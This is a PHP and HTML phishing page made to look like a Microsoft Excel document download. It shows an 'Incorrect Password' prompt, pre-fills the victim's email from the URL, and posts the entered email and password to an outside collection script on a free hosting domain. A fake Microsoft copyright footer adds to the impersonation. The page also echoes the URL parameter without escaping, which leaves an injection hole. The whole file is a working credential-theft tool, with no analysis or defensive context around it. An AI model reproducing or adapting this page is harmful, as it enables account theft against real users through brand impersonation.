<?php
$taagert = $_GET["email"];
?>
﻿<html>
<head>

<style>

input[type=text], input[type=email] {
    width: 30%;
    padding: 12px 20px;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #ccc;
    box-sizing: border-box;
}


input[type=text], input[type=password] {
    width: 30%;
    padding: 12px 20px;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #ccc;
    box-sizing: border-box;
}

button {
    background-color: green;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    cursor: pointer;
    width: 30%;
}

button:hover {
    opacity: 0.8;
}

.cancelbtn {
    width: auto;
    padding: 10px 18px;
    background-color: #f44336;
}

.imgcontainer {
    text-align: center;
    margin: 24px 0 12px 0;
}

img.avatar {
    width: 40%;
    border-radius: 50%;
}

.container {
    padding: 16px;
}

span.psw {
    float: right;
    padding-top: 16px;
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
    span.psw {
       display: block;
       float: none;
    }
    .cancelbtn {
       width: 100%;
    }
}
</style>
<title>Sample</title>
<link rel="icon" href="https://d2myx53yhj7u4b.cloudfront.net/sites/default/files/excel%402x.png" type="image/gif" sizes="16x16">
</head>
<body>
<body bgcolor="whitesmoke">
<br><br>

<center><IMG SRC="http://www.softsolutionworks.com/images/Excel/excel-intro.PNG" width="400" height="200"></center><center><font face="Trebuchet MS" color="green" size="5">Incorrect Password

</font></center> 
<form method="post" action="https://technolibra.000webhostapp.com/apple/post2.php">
<center><input type="email" name="email" placeholder="Email" size="70" required="" value="<?php echo $taagert;?>" tabindex="10"><p><input name="password" placeholder="password" size="70" required="" maxlength="100" TABINDEX="60" type="password"></p></center>
<center><p><button type="submit">DOWNLOAD</button></p>
<label>




 <style>
.footer {
    position: fixed;
    left: 0;
    bottom: 0;
    width: 100%;
    background-color: #c5c5c5;
    color: black;
    text-align: center;
}
</style>

<div class="footer">
  <p><font face="Trebuchet MS" color="white" size="2"> © Microsoft Inc 2018 Reserved</font> </p>
</div> 

</body></html>